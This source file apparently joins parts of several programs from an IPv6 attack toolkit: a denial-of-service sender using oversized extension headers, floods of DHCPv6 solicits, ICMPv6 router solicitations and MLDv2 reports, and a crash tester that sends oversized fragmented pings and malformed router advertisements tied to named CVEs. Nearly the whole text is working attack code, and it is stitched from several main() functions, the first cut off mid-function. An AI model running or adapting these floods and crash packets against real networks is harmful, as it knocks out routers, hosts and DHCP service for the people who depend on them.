printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
printf("The following test cases are currently implemented:\n");
printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n");
printf(" 2 : large destination header filled with unknown options\n");
exit(0);
}
printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");
/********************** TEST CASES ************************/
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
j = 4;
i = 2;
while (j <= 1408) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 6; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 8;
break;
case 5: // prevent router alert option twice
buf[j] = 1;
// fall through
default:
buf[j + 1] = 2;
j += 4;
}
j += buf[j + 1] + 2;
i++;
}
for (i = 1; i < 236; i++) {
buf[i * 6 - 2] = (i % 63) + 1;
buf[i * 6 - 1] = 4;
}
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
printf("Test %d: large destination header filled with unknown options.\n", count);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
for (i = 1; i < 237; i++) {
buf[6 + i * 6] = (i % 63) + 1;
buf[5 + i * 6] = 4;
}
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
// code
}
count++;
/******************* END OF TESTCASES ***************************/
count = 0;
while (1) {
thc_send_pkt(interface, pkt, &pkt_len);
usleep(1);
count++;
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
char wdatabuf[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, pkt_len = 0, dlen = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 0, use_real_link = 0;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'd':
do_dns = 1;
dns_name = optarg;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
if (argc - optind <= 1)
dst = thc_resolve6("ff02::1:2");
else
dst = thc_resolve6(argv[optind + 1]);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (src == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
exit(-1);
}
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
}
printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
while (1) {
count++;
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
// we have to tone it down, otherwise we will not get advertisements
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
pkt = thc_destroy_packet(pkt);
if (do_all) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
if (count % 1000 == 0)
printf(".");
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char *interface;
unsigned char mac[6] = "", *mac6 = mac;
unsigned char buf[1460];
unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL;
int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK;
unsigned char *pkt2 = NULL;
int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0;
int until = 0, rand_src = 0, rand_mac = 0;
thc_ipv6_hdr *hdr = NULL;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "sSDFH")) >= 0) {
switch (i) {
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
case 's':
rand_src = 1;
break;
case 'S':
rand_mac = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 1)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[optind];
if (argc - optind > 1) {
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]);
exit(-1);
}
if (dst[0] >= 0x20 && dst[0] <= 0xfd)
prefer = PREFER_GLOBAL;
}
dstmac = thc_get_mac(interface, src, dst);
src = thc_get_own_ipv6(interface, dst, prefer);
mac6 = thc_get_own_mac(interface);
if (mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 1;
memcpy(buf + 2, mac6, 6);
i = 8;
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
return -1;
thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2);
hdr = (thc_ipv6_hdr *) pkt2;
k = rand();
if (do_hdr_size)
offset = do_hdr_size;
printf("Starting to flood with ICMPv6 router solicitation on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (until != 1) {
if (rand_mac) {
memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4);
memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4);
}
if (rand_src) {
memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3);
}
if (rand_mac || rand_src) {
hdr->pkt[offset + 42] = 0;
hdr->pkt[offset + 43] = 0;
mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40);
hdr->pkt[offset + 42] = mychecksum / 256;
hdr->pkt[offset + 43] = mychecksum % 256;
k++;
}
count++;
if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) {
printf("!");
}
// usleep(1);
if (count % 1000 == 0)
printf(".");
if (until > 1)
until--;
}
return 0;
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i = 0, j, srcmtu, fragsize, offset = 14;
pcap_t *p;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (strcmp(argv[1], "-p") == 0) {
noping = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
dst6 = thc_resolve6(argv[2]);
route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(buf, 0, sizeof(buf));
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
strcat(string, thc_ipv62notation(src6));
strcat(string2, thc_ipv62notation(dst6));
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
if (do_hdr_size)
srcmtu -= (do_hdr_size - 14);
fragsize = ((srcmtu - 62) / 8) * 8;
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
setvbuf(stdout, NULL, _IONBF, 0);
memset(tests, 0, sizeof(tests));
printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
exit(-1);
} else
printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n");
/********************** TEST CASES ************************/
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
tmplen = 65864;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 3] = 0xe5;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x98;
hdr->pkt[offset + 40 + 3] = 0xa4;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0xa3;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x84;
hdr->pkt[offset + 40 + 3] = 0x90;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0x8f;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
tmplen = 65527;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 2] = 0x31;
hdr->pkt[offset + 40 + 3] = 0x8c;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
hdr->pkt[offset + 40 + 3] = 0x8a;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
memset(bla, count % 256, sizeof(bla));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
memset(buf, 0, sizeof(buf));
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = 128; // prefix length // BUG IS HERE
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i += 28;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, srcmac, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
sleep(1);
thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
i = 0;
while (ports[i] != 0) {
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
pkt_len = 0;
i++;
}
}
count++;
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count%256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
// more?
/******************* END OF TESTCASES ***************************/
if (noping == 1 || check_alive(p, interface, src6, dst6))
printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
else
printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)];
unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst);
int i, j, prefer = PREFER_LINK;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
int count = 0;
if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc > 2) {
if ((dst = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
exit(-1);
}
if (dst[0] >= 0x20 && dst[0] <= 0xfd) {
prefer = PREFER_GLOBAL;
ip6 = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL);
}
}
mac[0] = 0x00;
mac[1] = 0x18;
ip6[9] = mac[1];
memset(buf, 0, sizeof(buf));
buf[0] = 5;
buf[1] = 2;
memset(buf2, 0, sizeof(buf2));
for (i = 0; i < RECORD_NUMBER; i++) {
buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE
buf2[3 + i * 36] = 1;
buf2[4 + i * 36] = 0xff;
buf2[5 + i * 36] = 0x02;
memcpy(buf2 + 20 + i * 36, ip6, 16);
}
printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 0; i < 4; i++)
mac[2 + i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
for (i = 0; i < RECORD_NUMBER; i++) {
for (j = 0; j < 6; j++)
buf2[14 + j + i * 36] = rand() % 256;
memcpy(buf2 + 29 + i * 36, ip6 + 9, 7);
}
count++;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
// fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
// perror("");
// return -1;
printf("!");
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 1000 == 0)
printf(".");
}
return 0;
}